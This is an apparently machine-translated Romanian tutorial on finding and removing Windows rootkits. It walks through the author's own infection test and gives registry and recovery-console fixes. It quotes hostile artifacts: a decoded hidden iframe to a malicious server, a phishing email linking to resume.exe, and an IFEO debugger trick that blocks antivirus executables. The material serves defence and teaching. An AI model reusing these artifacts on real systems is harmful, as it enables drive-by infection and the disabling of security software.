Cum să eliminați un virus din folderul Windows. Unde se ascund virușii și cum se utilizează comanda msconfig în Windows. Eliminarea fișierelor temporare
& nbsp & nbsp Probabil că ați întâlnit în mod repetat informații în mass-media că a apărut un nou virus teribil, care poate duce la o nouă epidemie teribilă și aproape la sfârșitul internetului. Sau ce a apărut tehnologie nouă definirea virusului bazată pe utilizarea celor mai puțin semnificative biți de pixeli imagini grafice, iar corpul virusului este aproape imposibil de detectat. Sau... o mulțime de alte lucruri urâte. Uneori, virușii se înzestrează aproape cu rațiune și conștiință de sine. Acest lucru se întâmplă din cauza faptului că mulți utilizatori, confuzi în clasificare complexăși detaliile mecanismului de funcționare a virușilor, ei uită că, în primul rând, orice virus este program de calculator, adică un set de instrucțiuni ale procesorului (instrucțiuni), formatate într-un anumit mod. Nu contează sub ce formă există acest set (un fișier executabil, un script, o parte a sectorului de boot sau un grup de sectoare din afara sistemului de fișiere) - este mult mai important ca acest program să nu poată obține controlul, de exemplu. începe executarea. Înregistrat pe dvs HDD, dar un virus care nu pornește este la fel de inofensiv ca orice alt fișier. Sarcina principală în lupta împotriva virușilor nu este de a detecta corpul virusului, ci de a preveni posibilitatea lansării acestuia. Prin urmare, producătorii de viruși competenți îmbunătățesc în mod constant nu numai tehnologiile de introducere a software-ului rău intenționat în sistem, ci și metodele de lansare și funcționare sub acoperire.
Cum se infectează un computer cu software rău intenționat (virus)? Răspunsul este evident - trebuie să ruleze un program. În mod ideal - cu drepturi administrative, de preferință - fără cunoștința utilizatorului și invizibil pentru acesta. Metodele de lansare sunt îmbunătățite în mod constant și se bazează nu numai pe înșelăciune, ci și pe caracteristicile sau deficiențele sistemului de operare sau ale software-ului aplicației. De exemplu, utilizarea funcției de rulare automată pentru mediile amovibile din mediu sisteme de operare Familia Windows a dus la răspândirea virușilor pe unități flash. Funcțiile de executare automată sunt de obicei apelate de pe medii amovibile sau de pe obișnuite folderele de rețea... La pornirea automată, fișierul este procesat Autorun.inf... Acest fișier determină ce comenzi execută sistemul. Multe companii folosesc această caracteristică pentru a-și rula programele de instalare. produse software cu toate acestea, a fost folosit și de producătorii de viruși. Ca rezultat, puteți uita de autorun ca o oarecare comoditate atunci când lucrați la un computer. - majoritatea utilizatorilor alfabetizați au dezactivat pentru totdeauna această opțiune.
Pentru a dezactiva funcțiile de executare automată în Windows XP / 2000, un fișier reg pentru import în registry.
Pentru Windows 7 și versiuni ulterioare, puteți dezactiva Redarea automată folosind aplicația Redare automată din Panoul de control. În acest caz, oprirea se aplică utilizatorului curent. O modalitate mai fiabilă de a vă proteja împotriva introducerii de viruși transportați pe dispozitivele amovibile este de a bloca executarea automată pentru toți utilizatorii care utilizează politici de grup:
& nbsp & nbsp Dar principalul „furnizor” de viruși este, fără îndoială, Internetul și, ca principală aplicație software- „Internet Browser” (browser). Site-urile devin din ce în ce mai complexe și mai frumoase, apar noi oportunități multimedia, rețelele de socializare cresc, numărul de servere este în continuă creștere și numărul vizitatorilor acestora este în creștere. Browserul de internet se transformă treptat într-un pachet software complex - un interpret al datelor primite din exterior. Cu alte cuvinte, într-un pachet software care execută programe bazate pe conținut necunoscut. Dezvoltatorii de browsere (browsere) lucrează în mod constant pentru a îmbunătăți securitatea produselor lor, dar producătorii de viruși avansează și ei, iar probabilitatea de infectare cu malware a sistemului rămâne destul de mare. Se crede că dacă nu vizitați „site-uri pentru adulți”, site-uri cu numere de serie produse software etc. atunci infecția poate fi evitată. Acest lucru nu este în întregime adevărat. Există multe site-uri piratate pe Internet, ai căror proprietari nici măcar nu sunt conștienți de hack. Și au trecut de mult vremurile în care biscuiții își răsfățau vanitatea prin înlocuirea paginilor (defacere). În zilele noastre, un astfel de hack este de obicei însoțit de introducerea în paginile unui site cu totul respectabil, un cod special pentru a infecta computerul vizitatorului. În plus, producătorii de viruși folosesc cei mai populari termeni de căutare pentru a afișa paginile infectate în SERP-uri. motoare de căutare... Interogările cu expresiile „descărcare gratuită” și „descărcare fără înregistrare și SMS” sunt deosebit de populare. Încercați să nu folosiți aceste cuvinte în interogări de căutareîn caz contrar, riscul de a obține un link către site-uri rău intenționate crește semnificativ. Mai ales dacă cauți un film popular care nu a fost încă lansat sau ultimul concert al unei trupe celebre.
& nbsp & nbsp Voi încerca să explic mecanismul de infectare a computerului unui vizitator al site-ului, într-o formă simplificată, cu un exemplu. Nu cu mult timp în urmă, când vizitam un site destul de popular, am primit o notificare de la PT Startup Monitor că aplicația rsvc.exeîncearcă să scrie în registru. Aplicația a fost finalizată cu succes de FAR, iar modificările din registru au fost anulate de PT Startup Monitor. Analiza paginilor site-ului a arătat prezența unui cod ciudat în limbajul Javascript care efectuează operațiuni de transformare a datelor șir care nu sunt text semnificativ. limbaj Javascript este acceptat de majoritatea browserelor moderne și este folosit pe aproape toate paginile web. Scriptul descărcat de pe astfel de pagini este executat de browserul de Internet. Ca urmare a numeroaselor transformări ale șirurilor menționate mai sus, a fost obținut un cod destul de simplu:
iframe src = „http://91.142.64.91/ts/in.cgi?rut4” lățime = 1 înălțime = 1 stil = „vizibilitate: ascuns”
Adică executarea script-ului CGI a serverului cu adresa IP 91.142.64.91 (care nu are nicio legătură cu site-ul vizitat) într-o fereastră separată (eticheta iframe) care măsoară 1 pixel în lățime și 1 pixel în înălțime, într-o formă invizibilă. fereastră. Rezultatul este o infecție virală foarte probabilă. Mai ales dacă nu există antivirus sau nu va reacționa la amenințare. Acest exemplu Redirecționarea ascunsă a unui vizitator către un site rău intenționat folosind eticheta „iframe” nu este probabil foarte relevantă astăzi, dar demonstrează destul de mult cum, în timp ce vizitezi un site legal, poți vizita invizibil altul, nu foarte legal, fără să știi măcar. Din păcate, nu există o garanție absolută împotriva infecției virale și trebuie să fii pregătit pentru faptul că va trebui să faci față singur virusului.
& nbsp & nbsp B timpuri recente, una dintre direcțiile principale în dezvoltarea programelor rău intenționate a devenit utilizarea în acestea a tuturor metodelor posibile de protecție împotriva detectării prin instrumente antivirus - așa-numitele tehnologii rootkit. Asemenea programe fie nu sunt detectate de antivirusi, fie nu sunt eliminate de către aceștia. În acest articol voi încerca să descriu o tehnică mai mult sau mai puțin universală pentru detectarea și eliminarea software-ului rău intenționat dintr-un sistem infectat.
& nbsp & nbsp Eliminarea unui virus „de înaltă calitate” devine o sarcină din ce în ce mai netrivială, deoarece dezvoltatorii oferă unui astfel de virus proprietăți care îngreunează cât mai mult posibil rezolvarea acestuia. Adesea, un virus poate funcționa în modul kernel și are capacități nelimitate de a intercepta și modifica funcțiile sistemului. Cu alte cuvinte, virusul are capacitatea de a-și ascunde fișierele, cheile de registry de utilizator (și antivirusul), conexiuni de retea, - orice ar putea fi un semn al prezenței sale pe sistemul infectat. Poate ocoli orice firewall, sisteme de detectare a intruziunilor și analizoare de protocol. Și, printre altele, poate funcționa modul sigur pornire Windows... Cu alte cuvinte, malware-ul modern este foarte greu de detectat și neutralizat.
& nbsp & nbsp De asemenea, dezvoltarea antivirusurilor nu stă pe loc - acestea sunt în mod constant îmbunătățite și, în majoritatea cazurilor, vor putea detecta și neutraliza malware-ul, dar mai devreme sau mai târziu, va avea loc o modificare a virusului care va fi prea dur pentru orice antivirus de ceva timp. Prin urmare, autodetecția și eliminarea unui virus este o sarcină care mai devreme sau mai târziu va trebui să fie efectuată de orice utilizator de computer.
Buna ziua.
Suntem interesați de candidatura dumneavoastră, dar vă sugerăm să completați
CV-ul nostru cu antet și trimite-l la [email protected]
Răspunsul nu este garantat, dar dacă CV-ul tău ne interesează, noi
te sunăm în câteva zile. Nu uita
indicați numărul de telefon, precum și postul pentru care aplicați. Dezirabil
indicați de asemenea dorințele de salariu.
Puteți descărca antetul nostru de la linkul de mai jos.
http://verano-konwektor.pl/resume.exe
& nbsp & nbsp Analiza antetelor de e-mail a arătat că acesta a fost trimis de la un computer din Brazilia printr-un server din Statele Unite. Și antetul este propus să fie descărcat de pe un server din Polonia. Și asta cu conținut în limba rusă.
& nbsp & nbsp Este clar că nu veți vedea niciun antet și, cel mai probabil, veți primi un program troian pe computer.
& nbsp & nbsp Descărcați fișierul resume.exe. Dimensiunea este de 159744 octeți. Nu îl lansez încă.
& nbsp & nbsp Copiez fișierul pe alte computere unde sunt instalate diverse antivirusuri - doar pentru o altă verificare a eficienței lor. Rezultatele nu sunt atât de fierbinți - Avast antivirus 4.8 Home Edition a rămas delicat tăcut. Symantec a strecurat-o "y - aceeași reacție. Doar AVG 7.5 Free Edition a funcționat. Se pare că acest antivirus, de fapt, câștigă popularitate dintr-un motiv.
& nbsp & nbsp Eu efectuez toate experimentele pe mașină virtuală cu sistemul de operare Windows XP. Cont cu drepturi de administrator, deoarece de cele mai multe ori virușii sunt introduși cu succes în sistem doar dacă utilizatorul este un administrator local.
& nbsp & nbsp Alergare. După ceva timp, fișierul infectat a dispărut, se pare că virusul și-a început fapta murdară.
& nbsp & nbsp Comportamentul sistemului nu s-a schimbat extern. Evident, este nevoie de o repornire. Pentru orice eventualitate, interzic conexiunile TCP în firewall. Las permise numai conexiuni UDP de ieșire: 53 (DNS) - trebuie să lăsați virusului măcar o oportunitate de a-și arăta activitatea. De regulă, după introducere, virusul trebuie să contacteze gazda sau un anumit server de pe Internet, ceea ce va fi indicat prin interogări DNS. Deși, din nou, în lumina celor de mai sus, un virus inteligent îi poate masca, poate ocoli și firewall-ul. Privind în viitor, voi spune că în acest caz particular acest lucru nu s-a întâmplat, dar pentru o analiză fiabilă a activității rețelei, este mai bine să trimiteți tot traficul unei mașini infectate printr-o alta, neinfectată, unde puteți fi sigur că Regulile de firewall sunt respectate, iar analizorul de trafic (am folosit Wireshark) arată ce este cu adevărat.
& nbsp & nbsp Reporniți. În exterior, nimic nu s-a schimbat, cu excepția faptului că este imposibil să accesezi internetul, deoarece eu însumi am dezactivat această posibilitate. Nu a apărut nimic nou în căile de pornire automată, în servicii sau în cataloagele de sistem. Vizualizarea jurnalului de sistem oferă un singur sfat - sistemul nu a putut porni serviciul misterios mare48... Nu puteam avea un astfel de serviciu, iar în timp acest eveniment a coincis cu momentul implementării. Ce altceva ar sugera o implementare cu succes este lipsa unei intrări de registry pentru serviciul grande48 și absența unui al doilea mesaj în jurnalul de sistem că serviciul nu a pornit după repornire. Acesta este cel mai probabil un defect al scriitorilor de viruși. Deși este nesemnificativ, deoarece majoritatea utilizatorilor nu vizualizează jurnalul de evenimente, iar în momentul suspiciunii de infecție, această intrare din jurnal poate fi deja absentă.
Determinăm prezența unui virus în sistem.
1. & nbsp & nbsp Cu siguranță ar trebui să existe trafic „stânga”. Poate fi determinat folosind analizoare de protocol. Am folosit Wireshark. Imediat după încărcare, îl lansez mai întâi. Totul este corect, există un grup de interogări DNS (după cum s-a dovedit - o dată la 5 minute) pentru a determina adresele IP ale nodurilor ysiqiyp.com, irgfqfyu.com, updpqpqr.com etc. De fapt, tuturor sistemelor de operare Windows le place să meargă online atunci când este necesar și nu este necesar, antivirusurile își pot actualiza bazele de date, așa că este destul de dificil de stabilit dacă traficul aparține unui virus. De obicei, este necesar să treacă traficul printr-o mașină neinfectată și să analizeze serios conținutul acesteia. Dar acesta este un subiect separat. În principiu, un semn indirect de anomalie în activitatea de rețea a sistemului poate fi valori semnificative ale contoarelor de trafic ale furnizorului, în timpul opririi sistemului, contoare din proprietățile conexiunii VPN etc.
2. & nbsp & nbsp Să încercăm să folosim programe pentru a căuta rootkit-uri. Acum există deja o mulțime de astfel de programe și sunt ușor de găsit pe net. Unul dintre cele mai populare este Mark Russinovich, care poate fi descărcat din secțiunea Windows Sysinternals a site-ului Microsoft. Nu necesită instalare. Dezarhivați și rulați. Faceți clic pe „Scanați”. După o scurtă scanare, vedem rezultatele:
& nbsp & nbsp Apropo, fără măcar să aprofundați în conținutul rândurilor, puteți observa imediat că există înregistrări sau fișiere care sunt foarte „proaspete” în momentul creării/modificării (coloana "Timestamp-ul")... În primul rând, ar trebui să ne intereseze fișierele cu descrierea (coloana "Descriere") - „Ascuns de API-ul Windows”- Ascuns de API-ul Windows. Ascunderea fișierelor, a intrărilor de registry, a aplicațiilor nu este, desigur, normală. Doua fisiere - grande48.sys
și Yoy46.sys
- tocmai asta căutăm. Acesta este rootkit-ul căutat sau o parte a acestuia înregistrată sub masca driverelor, care oferă furt. Prezența celorlalți de pe listă a fost o surpriză pentru mine. Verificarea a arătat că acestea sunt normale Drivere Windows XP. În plus, virusul și-a ascuns prezența doar în dosar \ system32
, și copiile acestora în \ system32 \ dllcache
rămase vizibile.
& nbsp & nbsp Permiteți-mi să vă reamintesc că Windows XP folosește un mecanism special pentru a proteja fișierele de sistem, numit Windows File Protection (WFP)... Sarcina WFP este de a recupera automat important fișiere de sistem atunci când sunt eliminate sau înlocuite cu copii învechite sau nesemnate. Tot sistemul fișiere Windows XP sunt semnate digital și listate într-o bază de date dedicată utilizată de PAM. Folderul este folosit pentru a stoca copii ale fișierelor. \ system32 \ dllcache
și, parțial, \ Windows \ cache de drivere
... Când ștergeți sau înlocuiți unul dintre fișierele de sistem, WFP copiază automat copia „corectă” a acestuia din folderul \ dllcache. Dacă fișierul specificat lipsește în folderul \ dllcache, Windows XP vă solicită să introduceți CD-ul de instalare Windows XP în unitatea CD-ROM. Încercați să ștergeți vga.sys din \system32, iar sistemul îl va restabili imediat folosind copia din dllcache. Și situația în care, atunci când sistemul de recuperare a fișierelor rulează, fișierul driver este în \ dllcache și nu este vizibil în \ system32 - acesta este, de asemenea, un semn suplimentar al prezenței unui rootkit în sistem.
Îndepărtăm virusul din sistem.
& nbsp & nbsp Rămâne de efectuat cea mai importantă acțiune - eliminarea virusului. Cel mai simplu și mai fiabil mod este să porniți într-un alt sistem de operare, neinfectat și să împiedicați pornirea driverelor rootkit.
Să folosim consola standard Recuperare Windows... Luați discul de instalare Windows XP și porniți de pe acesta. Pe primul ecran, selectați al 2-lea element de meniu - apăsați R.
Alegem un sistem (dacă sunt mai multe):
Introduceți parola de administrator.
O listă de drivere și servicii poate fi vizualizată folosind comanda listsvc:
Într-adevăr, lista conține Yoy46 , deși grande48 lipsește, ceea ce înseamnă că fișierul driver grande48.sys este ascuns în sistem, dar nu se încarcă:
Consola de recuperare vă permite să preveniți sau să permiteți pornirea driverelor și a serviciilor folosind comenzile dezactivațiși permite... Interzicem pornirea Yoy46 cu comanda:
& nbsp & nbsp Lansăm comanda EXIT și sistemul se repornește.
După o repornire, driverul de rootkit nu va fi încărcat, ceea ce va ușura ștergerea fișierelor și ștergerea registrului din intrările sale. O poți face manual sau poți folosi un fel de antivirus. Cel mai eficient, după părerea mea, va fi un scaner gratuit bazat pe binecunoscutul antivirus Dr.Web Igor Danilov. Îl puteți descărca de aici - http://freedrweb.ru
& nbsp & nbsp De asemenea, puteți descărca „Dr.Web LiveCD” - o imagine de disc care vă permite să restabiliți funcționarea sistemului afectat de viruși pe stațiile de lucru și serverele care rulează Windows \ Unix, să copiați informații importante pe medii amovibile sau pe alt computer , dacă acțiunile programelor rău intenționate au făcut imposibilă pornirea computerului. Dr.Web LiveCD nu numai că va ajuta la curățarea computerului de fișiere infectate și suspecte, dar va încerca și să vindece obiectele infectate. Pentru a elimina virusul, trebuie să descărcați imaginea (fișierul cu extensia .iso) de pe site-ul DrWeb și să o inscripționați pe un CD. Va fi creat disc de pornire, având pornit din care, ghidat de un meniu simplu și clar.
& nbsp & nbsp Dacă, dintr-un motiv oarecare, nu este posibil să utilizați Dr.Web LiveCD, puteți încerca scanerul antivirus Dr.Web CureIt!, care poate fi lansat prin pornirea într-un alt sistem de operare, de exemplu, folosind Winternals Comandantul ERD. Pentru a scana un sistem infectat, este necesar să specificați hard disk-ul acestuia (modul „Scanare personalizată”). Scanerul vă va ajuta să găsiți fișierele virusului și tot ce trebuie să faceți este să ștergeți din registru intrările asociate cu acesta.
& nbsp & nbsp Deoarece virușii au învățat să se înregistreze pentru a rula în modul de pornire sigură, nu strica să verificați ramura de registry:
HKEY_LOCAL_MACHINE \ SYSTEM \ CurrentControlSet \ Control \ SafeBoot
Secțiuni:
Minim- o listă de drivere și servicii care rulează în modul sigur
Reţea- la fel, dar cu suport de rețea.
Permiteți-mi să adaug că există o nouă clasă rootkit reprezentată de BackDoor.MaosBoot, care a apărut la sfârșitul anului 2007. Acest troian se scrie singur în sectorul de boot Hard diskși oferă instalarea ascunsă a driverului său în memorie. Driverul Rootkit în sine este scris direct în ultimele sectoare ale discului fizic, ocolind Sistemul de fișiere, care își ascunde prezența pe disc. În general, principiul nu este nou, acum zece ani, programele rău intenționate erau ascunse în mod similar pe pistele de rezervă ale dischetelor și hard disk-uri Cu toate acestea, s-a dovedit a fi foarte eficient, deoarece majoritatea antivirusurilor încă nu pot face față sarcinii de a elimina BackDoor.MaosBoot. Sectorul de boot menționat mai sus nu verifică, iar sectoarele de la capătul discului pentru acesta nu au nicio legătură cu sistemul de fișiere și, desigur, nu va detecta un astfel de rootkit. Adevărat, Dr.Web (și, prin urmare, Cureit) se descurcă bine cu BackDoor.MaosBoot.
& nbsp & nbsp Dacă aveți îndoieli cu privire la un fișier, puteți utiliza serviciul antivirus online gratuit virustotal.com. Printr-un formular special pe pagina principala site-ul, încărcați un fișier suspect și așteptați rezultatele. Virustotal utilizează versiuni de consolă ale multor antivirusuri pentru a vă scana fișierul suspect. Rezultatele sunt afișate pe ecran. Dacă fișierul este rău intenționat, atunci cu un grad ridicat de probabilitate, îl veți putea determina. Într-o oarecare măsură, serviciul poate fi folosit pentru a selecta „cel mai bun antivirus”.
un link către unul dintre firele de forum ale site-ului virusinfo.info, unde utilizatorii postează link-uri către diverse resurse dedicate protectie antivirus, incl. și online - vă verifică computerul, browserul, fișierele...
& nbsp & nbsp Uneori, ca rezultat acțiuni incorecte virus (sau antivirus), sistemul oprește complet încărcarea. Permiteți-mi să vă dau un exemplu tipic. Programele rău intenționate încearcă să se infiltreze în sistem folosind diverse metode, inclusiv destul de neobișnuite. În timpul procesului inițial de pornire, chiar înainte ca utilizatorul să fie înregistrat, se lansează Managerul de sesiune (\ SystemRoot \ System32 \ smss.exe), a cărui sarcină este să pornească subsistemele și serviciile (serviciile) de nivel înalt ale sistemului de operare. În această etapă, sunt pornite procesele CSRSS (Client Server Runtime Process), WINLOGON (Windows Logon), LSASS (LSA shell) și restul serviciilor cu parametrul Start = 2 din cheia de registry.
HKEY_LOCAL_MACHINE \ SYSTEM \ CurrentControlSet \ Services
& nbsp & nbsp Informațiile specifice Managerului de sesiune se află în cheia de registry
HKEY_LOCAL_MACHINE \ SYSTEM \ CurrentControlSet \ Control \ Manager de sesiune
Una dintre modalitățile de a-l introduce în sistem este înlocuirea fișierului dll pentru CSRSS. Dacă te uiți la conținutul postării
HKEY_LOCAL_MACHINE \ SYSTEM \ CurrentControlSet \ Control \ Session Manager \ SubSystems
Veți găsi semnificațiile
ServerDll = baserv, ServerDll = winsrv... Bibliotecile basesrv.dll și winsrv.dll sunt fișierele de sistem „corecte” încărcate de serviciul CSRSS pe un sistem normal (neinfectat). Această intrare din registru poate fi corectată la o intrare care oferă încărcare, de exemplu, în loc de baserv.dll, malițiosul basepvllk32.dll:
ServerDll = basepvllk32 (sau un alt dll, altul decât basesrv și winsrv)
Acest lucru va asigura, la următoarea repornire, că malware-ul este sub control. Dacă antivirusul dvs. detectează și elimină basepvllk32 încorporat, lăsând intactă intrarea din registry, atunci pornirea sistemului se va încheia cu un „ecran albastru al morții” (BSOD) cu eroare STOP c000135 și mesajul despre incapacitatea de a încărca basepvllk32.
Puteți corecta situația astfel:
Acesta va porni în consola de recuperare (sau în orice alt sistem) și va copia fișierul baserv.dll din folderul C:\WINDOWS\system32 în același folder sub numele basepvllk32.dll. După aceea, sistemul va porni și puteți corecta manual intrarea din registry.
- porniți folosind Winternals ERD Commander și remediați intrarea în registry ServerDll = baserv... Sau derulați înapoi sistemul folosind un punct de restaurare.
& nbsp & nbsp Un alt exemplu tipic. Malware-ul se înregistrează ca depanator pentru procesul explorer.exe prin crearea unei intrări în registru precum:
„Debugger” = „C:\Fișiere de program\Microsoft Common\wuauclt.exe”
Eliminarea wuauclt.exe de către antivirus fără a șterge intrarea din registry face ca explorer.exe să nu poată porni. Ca rezultat, ajungi cu un desktop gol, fără butoane sau comenzi rapide. Puteți ieși din situație folosind combinația de taste CTRL-ALT-DEL. Selectați „Task Manager” - „New Task” - „Browse” - găsiți și rulați editorul de registry regedit.exe. Apoi scoateți cheia
HKM \ SOFTWARE \ Microsoft \ Windows NT \ CurrentVersion \ Image File Execution Options \ explorer.exe
și reporniți.
& nbsp & nbsp În cazul în care știți exact când a fost infectat sistemul, revenirea la un punct de restaurare înainte de acest eveniment este o modalitate destul de fiabilă de a scăpa de infecție. Uneori, este logic să efectuați nu o derulare completă, ci una parțială, cu restaurarea fișierului de registry SYSTEM, așa cum este descris în articolul „Probleme la încărcarea sistemului de operare” din secțiunea „Windows”
& nbsp & nbsp == mai 2008. ==
Plus
& nbsp & nbsp Acest supliment a apărut la aproximativ un an după ce a fost scris articolul principal. Aici am decis să postez cele mai interesante soluții care au apărut în procesul de combatere a software-ului rău intenționat. Ceva de genul unor note scurte.
După eliminarea virusului, niciun antivirus nu funcționează.
& nbsp & nbsp Cazul este interesant prin faptul că metoda de blocare a software-ului antivirus poate fi folosită în lupta împotriva fișierelor executabile ale virușilor. Totul a început cu faptul că, după eliminarea unui virus destul de primitiv, Stream Anti-Virus licențiat nu a funcționat. Reinstalările cu curățarea registrului nu au ajutat. O încercare de a instala Avira Antivir Personal Free sa încheiat cu succes, dar antivirusul în sine nu a pornit. A existat un mesaj de timeout în syslog la pornirea serviciului „Avira Antivir Guard”. Repornirea manuală s-a soldat cu aceeași eroare. Mai mult, nu au fost efectuate procese inutile în sistem. Era o sută la sută certitudine - nu existau viruși, rootkit-uri și alte lucruri urâte (Malware) în sistem.
& nbsp & nbsp La un moment dat am încercat să rulez utilitarul antivirus AVZ. Principiul funcționării AVZ se bazează în mare măsură pe căutarea diferitelor anomalii în sistemul studiat. Pe de o parte, ajută la căutarea programelor malware, dar, pe de altă parte, suspiciunile cu privire la componentele antivirus, antispyware și alte software-uri legitime care interacționează activ cu sistemul sunt destul de naturale. Pentru a suprima răspunsul AVZ la obiectele legitime și pentru a simplifica analiza rezultatelor scanării sistemului prin marcarea obiectelor legitime cu culoare și filtrarea lor din jurnale, este utilizată baza de date a fișierelor sigure AVZ. Recent, a fost lansat un serviciu complet automat, care permite tuturor să trimită fișiere pentru a completa această bază de date.
Dar: fișierul executabil avz.exe nu a pornit! Redenumiți avz.exe în musor.exe - totul începe bine. Încă o dată, AVZ s-a dovedit a fi un asistent de neînlocuit în rezolvarea problemei. La efectuarea verificărilor, în rezultate au apărut următoarele rânduri:
Periculos - depanator de procese „avz.exe” = „ntsd-d”
Periculos - depanator de procese „avguard.exe” = „ntsd-d”
:.
Acesta a fost deja o pistă serioasă. Căutarea în registru pentru contextul „avz” a dus la o ramură
HKEY_LOCAL_MACHINE \ SOFTWARE \ Microsoft \ Windows NT \ CurrentVersion \ Opțiuni de execuție a fișierului imagine
Secțiunea numită avz.exe care conține un parametru șir numit "Depanator"și valoare.
Și, după cum sa dovedit mai târziu, această ramură conținea nu numai secțiunea „avz.exe”, ci și secțiuni cu numele modulelor executabile ale aproape tuturor antivirusurilor cunoscute și unele utilitare de monitorizare a sistemului. Ntsd.exe în sine este un depanator Windows complet legal, care este standard în toate versiunile de sistem de operare, dar o astfel de intrare în registry face imposibilă pornirea unei aplicații al cărei nume de fișier executabil coincide cu numele secțiunii ???.Exe.
& nbsp & nbsp După ștergerea tuturor cheilor numite ???.exe și care conțineau intrarea „Debugger” = „ntsd -d” din registry, sistemul s-a recuperat complet.
Ca urmare a analizei situației cu utilizarea parametrului „ntsd -d” pentru a bloca lansarea fișierelor executabile, a venit ideea de a folosi aceeași tehnică pentru combaterea virușilor înșiși. Desigur, acesta nu este un panaceu, dar într-o oarecare măsură poate reduce amenințarea de a vă infecta computerul cu viruși cu nume cunoscute de fișiere executabile. Pentru a face imposibilă executarea fișierelor cu numele ntos.exe, file.exe, system32.exe etc. pe sistem. puteți crea un fișier reg pentru a fi importat în registry:
Windows Registry Editor versiunea 5.00
„Depanator” = „ntsd -d”
„Depanator” = „ntsd -d”
„Depanator” = „ntsd -d”
:.. etc.
Vă rugăm să rețineți că numele secțiunii nu conține calea fișierului, astfel încât această metodă nu poate fi utilizată pentru fișierele cu virus ale căror nume coincid cu numele fișierelor executabile legale, dar fișierele în sine nu sunt localizate în mod standard în sistemul de fișiere. De exemplu, explorer Explorer.exe se află în folderul \ WINDOWS \, iar virusul este situat în altă parte - în rădăcina discului, în folderul \ temp, \ windows \ system32 \. Dacă creați o partiție numită „Explorer.exe”, apoi după conectare, veți obține un desktop gol, deoarece exploratorul nu va porni. Și mai rău, dacă creați o partiție care are același nume cu serviciul de sistem (winlogon.exe, csrss.exe, smss.exe, services.exe, lsass.exe), veți avea un sistem prăbușit. Dacă virusul este localizat în C: \ temp \ winlogon.exe, iar modulul legal de conectare este C: \ WINDOWS \ SYSTEM32 \ winlogon.exe, crearea unei partiții numită winlogon.exe va duce la imposibilitatea de a porni serviciul winlogon și blocați sistemul cu un ecran albastru al morții (BSOD).
& nbsp & nbsp Dar, cu toate acestea, nu merită să sperăm că codul cerut de virus se va potrivi în fiecare caz concret. Deoarece nu ar trebui să sperați la o autodistrugere sinceră a virusului, și cu atât mai mult, nu ar trebui să trimiteți SMS-uri. Orice virus poate fi eliminat, chiar dacă nu este detectat de software-ul antivirus. Metodele de eliminare a ransomware-ului nu sunt diferite de metodele de eliminare a oricărui alt software rău intenționat, cu o, poate, diferență - nu ar trebui să pierdeți timpul încercând să faceți față cu gunoiul în mediul unui sistem infectat, decât pentru a vă dezvolta propriile abilități și a completa. cunoştinţe.
Cea mai simplă și eficientă modalitate este să pornești folosind un sistem diferit, neinfectat și, după ce te-ai conectat la cel infectat, să ștergi fișierele cu virus și să repari intrările din registry. Am scris deja despre asta mai sus, în partea principală a articolului, și aici voi încerca să subliniez doar câteva scurte opțiuni pentru eliminarea virusului.
Utilizarea Dr.Web LiveCD este cea mai simplă metodă care nu necesită cunoștințe speciale. Descărcați imaginea ISO CD, inscripționați-o pe disc, porniți de pe CD-ROM și rulați scanerul. Folosind Winternals ERD Commander. Porniți de pe acesta, vă conectați la sistemul infectat și reveniți la un punct de control de recuperare cu o dată la care nu a existat încă nicio infecție. Alegeți meniul Instrumente de sistem - Restaurare sistem... Dacă nu puteți derula înapoi folosind ERD Commander, încercați să găsiți manual fișierele de registry în datele punctului de control și să le restaurați în directorul Windows.Am descris în detaliu în articolul „Lucrul cu registry”. Pornirea la un alt sistem de operare și eliminarea manuală a virușilor. Cel mai dificil, dar cel mai eficient mod. Cel mai convenabil este să utilizați același ERD Commander ca un alt sistem de operare. Metoda de detectare și eliminare a unui virus poate fi următoarea:
Accesați discul sistemului infectat și scanați cataloagele de sistem pentru fișiere executabile și fișiere driver cu o dată de creare apropiată de data infecției. Mutați aceste fișiere într-un folder separat. Acordați atenție directoarelor
\ Windows
\ Windows \ system32
\ Windows \ system32 \ drivere
\ Windows \ Sarcini \
\ RECICLATOR
\ Informații despre volumul sistemului
Directoare de utilizatori \ Documente și setări \ Toți utilizatoriiși \ Documente și setări \ nume de utilizator
Este foarte convenabil de utilizat pentru a găsi astfel Fișiere FAR Manager, cu sortarea după dată activată pentru panoul în care este afișat conținutul directorului (combinație CTRL-F5). Acordați o atenție deosebită fișierelor executabile ascunse. Există, de asemenea, un utilitar eficient și simplu de la Nirsoft - SearchMyFiles, a cărui utilizare permite, în majoritatea covârșitoare a cazurilor, detectarea cu ușurință a fișierelor rău intenționate chiar și fără a utiliza un antivirus. Metodă de detectare a fișierelor rău intenționate în funcție de momentul creării (ora de creare)
Conectați-vă la registrul sistemului infectat și căutați legături către numele acestor fișiere. Registrul în sine nu interferează cu pre-copierea (complet sau cel puțin acele părți în care se găsesc link-urile de mai sus). Puteți șterge legăturile sau puteți schimba numele fișierelor din ele în altele, de exemplu - fișier.exe în fișier.ex_, server.dll în server.dl_, driver.sys în driver.sy_.
Aceasta metoda nu necesită cunoștințe speciale și în cazurile în care virusul nu modifică data de modificare a fișierelor sale (ceea ce este încă foarte rar) - are un efect pozitiv. Chiar dacă virusul nu este detectat de software-ul antivirus.
Dacă metodele anterioare nu au dat un rezultat, rămâne un lucru - căutarea manuală opțiuni posibile lansarea unui virus. În meniu Instrumente administrative Comandantul ERD „și există articole:
Autoruns- informații despre parametrii de lansare a aplicației și shell-ul utilizatorului.
Manager de service și șofer- informații despre servicii și drivere de sistem.
Primul semn de infecție la dumneavoastră calculator personal(laptop, telefon sau tabletă), este de obicei o încetinire a performanțelor (totul obișnuit să zboare), precum și apariția altor probleme „ciudate”.
Infecția cu un virus sau spyware se poate întâmpla chiar și cu antivirusul instalat.
Uneori se întâmplă ca fie comportamentul ciudat al computerului să fie rezultatul unor probleme hardware (hard disk, memorie), fie al unui conflict de programe, drivere, dar întotdeauna este mai bine să verificați în prealabil computerul pentru malware (în timp ce Windows se încarcă) .
Înainte de a face orice, cel mai bine este să deconectați computerul de la Internet și să-l lăsați deconectat până când sunteți sigur că computerul a fost curățat. Poate că acest lucru va ajuta la prevenirea răspândirii programelor malware și a datelor dvs. personale.
Și așa, făcând asta pas cu pas ghid pentru începători, Vă veți curăța în mod independent computerul de viruși și orice alt software rău intenționat.
Pasul 1: Porniți în „Modul sigur” Windows
Windows Safe Mode este un mod în care se încarcă doar minim programele necesare si serviciu.
De regulă, virușii pornesc automat când pornește Windows, așa că, folosind modul Safe, îi împiedicați automat să pornească.
1. Pentru a porni Windows XP / 7 Safe Mode, opriți computerul, apoi porniți și apăsați continuu Tasta F8, până când apare meniul modului sigur.
